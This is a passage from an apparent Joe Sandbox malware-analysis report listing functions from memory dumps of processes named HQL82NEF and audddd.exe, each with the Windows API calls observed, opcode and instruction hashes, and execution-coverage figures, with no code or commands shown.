Opcode Fuzzy Hash: c44ead0cee4dafe2ea0b280b1d268e557aed59489589f34e3d25fd33cb41b393
Instruction Fuzzy Hash: FA11F0B6C003098FDB20DF9AD444A9EFBF8AB89224F24845AD419B7640D774A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06EADD24 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,06EAEF57), ref: 06EAEFE7

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9a30dd4605bbf23593c412d05076ffecd9d4d7435218a64f70c1b2ecd83ebc29
Instruction ID: cb6f85dca3e6eef5039b280ad8ad9af6d3444ca05da88760aa94718fea98535f
Opcode Fuzzy Hash: 9a30dd4605bbf23593c412d05076ffecd9d4d7435218a64f70c1b2ecd83ebc29
Instruction Fuzzy Hash: 691125B58003498FCB50DF9AD544BDEFBF8EB88324F20845AE418A7310C775A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 074AC138 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 074AC195

Memory Dump Source

Source File: 00000003.00000002.1133444946.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_HQL82NEF.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b5aa3a5c6b7436d26d8940f1cd2f5442d0e3e6cf5606cec3de1133d4cf2f9e0c
Instruction ID: d5cebb6aaf59f6e2448e9f1951bc6dd571f56b85be2209a60b59c0c4d3d992a6
Opcode Fuzzy Hash: b5aa3a5c6b7436d26d8940f1cd2f5442d0e3e6cf5606cec3de1133d4cf2f9e0c
Instruction Fuzzy Hash: 751106B58003499FDB10CF9AC985BDEFFF8EB48320F24845AE454A7240D378A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06EAEF87 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,06EAEF57), ref: 06EAEFE7

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c6cc14f98b6509c3971d2b2b01476ae6293ec3e2d9e707291e8b4239af67b65b
Instruction ID: 6fa7296be5889d658d8a3ddb41a8e44db6e77ec1c1462906fd03bac60d38e908
Opcode Fuzzy Hash: c6cc14f98b6509c3971d2b2b01476ae6293ec3e2d9e707291e8b4239af67b65b
Instruction Fuzzy Hash: 1B11F5B58003498FCB10DF9AD545BDEFFF8EB88324F24845AD418A7610C775A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06EAF398 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06EAF3F5

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2d562280c7a88e3d7634a458bbd884ad9ada930f3c3574720382738fdf3dcc59
Instruction ID: 32963b68b5cc27c59c8aa3600ff6dee7932d36824b87b7b21fee4426044edf84
Opcode Fuzzy Hash: 2d562280c7a88e3d7634a458bbd884ad9ada930f3c3574720382738fdf3dcc59
Instruction Fuzzy Hash: 261115B58003488FCB60DFAAD545BDEFFF8EB48324F24845AD458A7610C378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06788768 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,02DE6408,?,?,?,?,?,?,06788640,00000000,00000000,?), ref: 067887CD

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 77a8dfe8a1c57821150ae2e2fdd171a6d7f5a83d4cb72b47416768134ec3cd87
Instruction ID: 6c23d4fea025f0e3b6b0efa582cc05104a846fef348cb0fe2f6596f8e8c1764d
Opcode Fuzzy Hash: 77a8dfe8a1c57821150ae2e2fdd171a6d7f5a83d4cb72b47416768134ec3cd87
Instruction Fuzzy Hash: 8B1106B58003499FDB60DF9AD885BDEBFF8EB48320F20845AE554A7240C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06786C48 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,02DE6408,?,?,?,?,?,?,06788640,00000000,00000000,?), ref: 067887CD

Memory Dump Source

Source File: 00000003.00000002.1132701210.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6780000_HQL82NEF.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: b0031b93bbbc01dc6c7d482741b1e1af1c241e6ff21dbe405e40922b0fbf9ec7
Instruction ID: 28fbd07c625c5bf41b3452db0058f162a55513f515e128b52f3f45cfda65e9d2
Opcode Fuzzy Hash: b0031b93bbbc01dc6c7d482741b1e1af1c241e6ff21dbe405e40922b0fbf9ec7
Instruction Fuzzy Hash: C21118B59003099FDB50DF9AD884BDEFFF8EB48320F20845AE414A7200C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06EADFCC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06EAF3F5

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d7b78ca13b894258c4e1e50476d80629cda0a7e185972104700f6363c774c5f6
Instruction ID: 5f600e9eccba9bc8f51b04579e11c2bf0e5deeb9a953decb521bafc6f697b4de
Opcode Fuzzy Hash: d7b78ca13b894258c4e1e50476d80629cda0a7e185972104700f6363c774c5f6
Instruction Fuzzy Hash: 5D1115B18003488FCB60DF9AD548BDEFFF8EB48324F20845AD458AB200D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 074AC098 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 074AC0F5

Memory Dump Source

Source File: 00000003.00000002.1133444946.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_HQL82NEF.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a497e9cbb712d88c4afbdabf405ad1499105fa5bc88128443c8df1e6ec849cd6
Instruction ID: 55922542848283b8ebe1aaf7f432e45d891b43f5a93583d8b8f6a332f898181d
Opcode Fuzzy Hash: a497e9cbb712d88c4afbdabf405ad1499105fa5bc88128443c8df1e6ec849cd6
Instruction Fuzzy Hash: AB11D6B58003499FDB50CF9AD584BDEBFF8EB48324F20845AD454A7200C375A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06EAF42C Relevance: 1.5, APIs: 1, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06EAF3F5

Memory Dump Source

Source File: 00000003.00000002.1133192242.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ea0000_HQL82NEF.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 30263c67d3e060865c33c03a988bc218582d51f666bff2331fe9c3f04b4604a6
Instruction ID: d96404049058be3ccd994f53a1949f84dac89a1ac3d55e1e32eb1b214370305c
Opcode Fuzzy Hash: 30263c67d3e060865c33c03a988bc218582d51f666bff2331fe9c3f04b4604a6
Instruction Fuzzy Hash: 45F059B29083808FCB2297ADD8583D9BFE4DF81355F24848AC089CF521C279E04AC791

Uniqueness

Uniqueness Score: -1.00%

Function 0133D1D8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129716106.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_133d000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bd2107029f4d6105a14d950a186116d3e3bf80571d50f8515de64d195def062
Instruction ID: f0cd6476a92df805bdeea55ef12b165b972e1010c7d7886ec624690cd7a586a2
Opcode Fuzzy Hash: 9bd2107029f4d6105a14d950a186116d3e3bf80571d50f8515de64d195def062
Instruction Fuzzy Hash: 3221F872504244DFDB05CF94D9C0B16BFA5FBC8328F64C669ED058B246C33AD456CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0133D3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129716106.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_133d000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ad12e46cb574215a7d85c5a900f64df580578f683471021956d49de808db13
Instruction ID: 1aabbe77f9b786e153f8fe80a41f96293ea63111e336d740bed9262f2e0442eb
Opcode Fuzzy Hash: 76ad12e46cb574215a7d85c5a900f64df580578f683471021956d49de808db13
Instruction Fuzzy Hash: 3F216772204244DFDB05CF58D9C0B56BFA5FBC4328F60C5A9E8091B606C73AE856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0134E31C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129738699.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_134d000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66b60962d5db88e2db8dab8da1ce5bbe57aefcd83d85c3d654d19dbabcd21efc
Instruction ID: fd6aaeaa2f7784ee3b0be2417a9eda880a2be77d35feca3dbb6d6c98f4b24b4a
Opcode Fuzzy Hash: 66b60962d5db88e2db8dab8da1ce5bbe57aefcd83d85c3d654d19dbabcd21efc
Instruction Fuzzy Hash: E721D375604244DFDB06CF18D5C0B26BBA5FB84318F24C5B9E8494A356C33EE846CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0134E50C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129738699.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_134d000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed65d9b6c251012418ff0e882bd9d1a554c518045af6cb0de6c8ab14a474a763
Instruction ID: f8251442c55480e5c00b0dc94bda546b499247464992e496a25d835a95e5911f
Opcode Fuzzy Hash: ed65d9b6c251012418ff0e882bd9d1a554c518045af6cb0de6c8ab14a474a763
Instruction Fuzzy Hash: 5B210475504244DFDB01DF18D9C0B26BBE5FB84328F24C6B9D8494B646E33EE446CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 0134E42C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129738699.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_134d000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4d708a2f12752d3576c240ee1e4b27b058532d246baaf440c833ec982b42c74
Instruction ID: 95b7ae34eb243ed8622bcec319c277d09bfdd5bd0fd2c2d0ebb2aa0303b9c2e8
Opcode Fuzzy Hash: a4d708a2f12752d3576c240ee1e4b27b058532d246baaf440c833ec982b42c74
Instruction Fuzzy Hash: 61212271604240DFEB05DF18D5C0B26BFE5FB84328F20C5B9D8095B752C33AE846CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0134E305 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129738699.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_134d000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6cd2fac000733f0d9bfa9dabcb37865a5ca57dfb715c793860bedbae3eee29
Instruction ID: 98914dc343e913a9f872bbd527e744d9878b4a7b5ba4155c510f351a11402a47
Opcode Fuzzy Hash: 9d6cd2fac000733f0d9bfa9dabcb37865a5ca57dfb715c793860bedbae3eee29
Instruction Fuzzy Hash: 64215075508380DFDB03CF28D594B15BFB1FB46214F24C5AAD8898B657C33AE856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0133D1D3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129716106.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_133d000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7293a8a996a9933c11cb2e358c381ae75aadffb26ef6baec95c3adea0869ec6
Instruction ID: f37cba6a68974aa1820bc03b6e03eaa53ec502f2a101b0bec24b3933c94f00d6
Opcode Fuzzy Hash: f7293a8a996a9933c11cb2e358c381ae75aadffb26ef6baec95c3adea0869ec6
Instruction Fuzzy Hash: 3421B176504240DFDB16CF54D9C4B16BF71FB84324F24C6A9DC484B656C33AD46ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0133D3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129716106.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_133d000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2f04dc84d66a0d42e145680352e01869c8a854c043734d5ebef4747bd96dbcb
Instruction ID: cbc94eb88956f219bb7858929d3baecf044ffb2fd7c3f8f289b261d504c01c30
Opcode Fuzzy Hash: f2f04dc84d66a0d42e145680352e01869c8a854c043734d5ebef4747bd96dbcb
Instruction Fuzzy Hash: 4411E676504280CFDB16CF54D9C4B56BF71FB84324F24C5A9D8494B617C33AE45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0134E507 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129738699.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_134d000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076f631c226bf6dbecb897e300abd939870013a3f5719c2a59eef717838c0dc0
Instruction ID: 2c96a10dfd142ee19849dea7476929af53f079579949f90547e36f7a58b8f20b
Opcode Fuzzy Hash: 076f631c226bf6dbecb897e300abd939870013a3f5719c2a59eef717838c0dc0
Instruction Fuzzy Hash: E811BF76504284CFDB12CF14D5C4B15FFA1FB84324F28C6BAD8494B646D33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0134E427 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1129738699.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_134d000_HQL82NEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de3f7e29dab2d1c7e3050d955b5bdc2c079248a67d162826f71a665d9c4cd598
Instruction ID: 98e7ae9a76f4d18516a61c189ad55eafcf56007e7e1861d4b5dfc82d36b421f8
Opcode Fuzzy Hash: de3f7e29dab2d1c7e3050d955b5bdc2c079248a67d162826f71a665d9c4cd598
Instruction Fuzzy Hash: 91119D75504280CFDB16CF18D5C4B15BFA1FB84718F24C6ADD8494BB56C33AE45ACB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: audddd.exePID: 7708, Parent PID: 2216COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	107
Total number of Limit Nodes:	4

Executed Functions

Function 012A2260 Relevance: 6.2, APIs: 4, Instructions: 187
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 012A2356
GetCurrentThread.KERNEL32 ref: 012A2393
GetCurrentProcess.KERNEL32 ref: 012A23D0
GetCurrentThreadId.KERNEL32 ref: 012A2429

Memory Dump Source

Source File: 00000011.00000002.821244386.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_audddd.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: cf554a6a57b76f15760d2557a9bfece5e74a713978df08446fa69c3b7749b437
Instruction ID: 044308f2cd650cb31c9826210b024f8bb5b464677f0cfe263e705bfc13a5bdaf
Opcode Fuzzy Hash: cf554a6a57b76f15760d2557a9bfece5e74a713978df08446fa69c3b7749b437
Instruction Fuzzy Hash: 9871F2B0815385CFDB16DF6DD5887DEBFF0AF4A304F24848AD458AB2A2D7345846CB25

Uniqueness

Uniqueness Score: -1.00%

Function 012A22D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 012A2356
GetCurrentThread.KERNEL32 ref: 012A2393
GetCurrentProcess.KERNEL32 ref: 012A23D0
GetCurrentThreadId.KERNEL32 ref: 012A2429

Memory Dump Source

Source File: 00000011.00000002.821244386.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_audddd.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6e90796bf08c3cfdb565929f6fa589a4859595dcbf749e862e8e7f827c8519bf
Instruction ID: f272b62043e45f2af3e975fd3600d45ed299e235e19d4df8d574fd8e06a98887
Opcode Fuzzy Hash: 6e90796bf08c3cfdb565929f6fa589a4859595dcbf749e862e8e7f827c8519bf
Instruction Fuzzy Hash: EF5177B0910249CFDB18DFAAE688B9EBFF1EF88304F208459E419A7360D7709945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02C1AC70 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 02C1ADAB

Memory Dump Source

Source File: 00000011.00000002.821363164.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2c10000_audddd.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a81d9039ffbd0b68362bea0a53096a36bf5b56cb77838e8b6d4f4f4e77423f96
Instruction ID: 805d7761ad495726457564d3c4c0f9c257741672eeec87a2616ee31926709cc9
Opcode Fuzzy Hash: a81d9039ffbd0b68362bea0a53096a36bf5b56cb77838e8b6d4f4f4e77423f96
Instruction Fuzzy Hash: 125145B0E012188FDB18DFA9C885B9DBBF5FF49314F14811AE819AB350DB74A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02C1AC64 Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 02C1ADAB

Memory Dump Source

Source File: 00000011.00000002.821363164.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2c10000_audddd.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b87a6da90e17726d2eed75d56b4af5e028b04b018a85784cc475e755f6e4d91d
Instruction ID: 51c5aaf97e529aede033eb9ddc8468397b9b0d4296248eee1943beb335b13dac
Opcode Fuzzy Hash: b87a6da90e17726d2eed75d56b4af5e028b04b018a85784cc475e755f6e4d91d
Instruction Fuzzy Hash: C95122B0E112188FDB18DFA9C885B9DBBF1BF49318F14811AE819BB350DB749945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02C1D59C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C1E90A

Memory Dump Source

Source File: 00000011.00000002.821363164.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2c10000_audddd.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 15227cde8a88538be402834d209e9cfa0e12ceb3c57be93dda3aac19bcd32861
Instruction ID: 981df3d2405375b6064b013d562306d6ca53915728fd1947f1438dafb8df6dec
Opcode Fuzzy Hash: 15227cde8a88538be402834d209e9cfa0e12ceb3c57be93dda3aac19bcd32861
Instruction Fuzzy Hash: 3351D0B1D00309DFDB14CF9AC984ADEBBB5FF89314F24812AE819AB210D7709945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02C1E7ED Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C1E90A

Memory Dump Source

Source File: 00000011.00000002.821363164.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2c10000_audddd.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 07dc9227dd4737431acbc9b5378936ee5807a6c85fbad623fad9f082da4a2dcc
Instruction ID: 03fdde82a2bd49ad2ce86d3ba3bf355b12242de9200411de99f96da76dbf549c
Opcode Fuzzy Hash: 07dc9227dd4737431acbc9b5378936ee5807a6c85fbad623fad9f082da4a2dcc
Instruction Fuzzy Hash: C751E2B1D10309DFDF14CFAAC984ADDBBB5BF88314F24812AE819AB214D7749945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012A2014 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 012A3411

Memory Dump Source

Source File: 00000011.00000002.821244386.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_audddd.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: bfcf21b7ccc4415d6f2cc74776784da301be0e14842a2f3397712be90ff6b9d4
Instruction ID: 23819b96e5bffd7377f4c2341911f9d285b8b5dbda49a66160242708a9293ddb
Opcode Fuzzy Hash: bfcf21b7ccc4415d6f2cc74776784da301be0e14842a2f3397712be90ff6b9d4
Instruction Fuzzy Hash: 60413AB5A10305DFDB15CF99C488AAABBF5FF88314F258459E519AB321D770E841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 012A2518 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012A24E6,?,?,?,?,?), ref: 012A25A7

Memory Dump Source

Source File: 00000011.00000002.821244386.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_audddd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 65e55632a0a962a038d9c6ec5ff3451aa8a1ef6f76a437aa94e0da5c7dd1d785
Instruction ID: 1110d0d24d55cd4f7b649446640f69cbdf94bc98fa05c395ddd261f0757e5093
Opcode Fuzzy Hash: 65e55632a0a962a038d9c6ec5ff3451aa8a1ef6f76a437aa94e0da5c7dd1d785
Instruction Fuzzy Hash: 2A2103B59102499FDB10CFAAD984ADEBFF8FB48320F24841AE914A7310D374A954CF64

Uniqueness

Uniqueness Score: -1.00%

Function 012A1EB0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012A24E6,?,?,?,?,?), ref: 012A25A7

Memory Dump Source

Source File: 00000011.00000002.821244386.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_12a0000_audddd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dbb05b209c01eea44ec37bde7b4a1b2c20ba509aa51e4ab4901918ce5505ad3f
Instruction ID: f30ac34583dcf29a27e2e31a64d683e6cd6ac4430a7437e619afba2cb1d4f90f
Opcode Fuzzy Hash: dbb05b209c01eea44ec37bde7b4a1b2c20ba509aa51e4ab4901918ce5505ad3f
Instruction Fuzzy Hash: 912103B5910248DFDB10CF9AD984AEEBFF8FB48320F14801AE958A7310D374A954CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02C13F47 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEncodePointer.NTDLL(00000000), ref: 02C13FD2

Memory Dump Source

Source File: 00000011.00000002.821363164.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2c10000_audddd.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: b95a64261745714331a74bf25d17ddfe8a89663e78f2c672beea274379e0b124
Instruction ID: 58b6c1936a5bb02efa693e0daa86c4a6eb299298ce3f26f81d404961b1f92fe7
Opcode Fuzzy Hash: b95a64261745714331a74bf25d17ddfe8a89663e78f2c672beea274379e0b124
Instruction Fuzzy Hash: F8218BB1900345CFCB60CFAAD54979EBFF4EB89318F2480A9D409E3640E739A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C13F58 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 02C13FD2

Memory Dump Source

Source File: 00000011.00000002.821363164.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2c10000_audddd.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: c222d0a1638dade9db291af4dd8b7b28d644af06666fdb2c01808da7acfc7eb0
Instruction ID: 54b06d2bbc6a32f59e245b56332edf5e37ceda5772b88c4ddfd39e8e0140d999
Opcode Fuzzy Hash: c222d0a1638dade9db291af4dd8b7b28d644af06666fdb2c01808da7acfc7eb0
Instruction Fuzzy Hash: 7A117CB19103498FDB60CFA9D54979EBFF4FB89318F2080A9E409E3640D739A544DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02BBD1D8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.821277598.0000000002BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2bbd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d44211d3be4bdcde001373bbbbb964561bba26b09c2b9630f6178368c88fe5
Instruction ID: 5db95bc5f7af273ce5fa29c532bc29efa5a9e5ad682a149183ce7719bbe8fed6
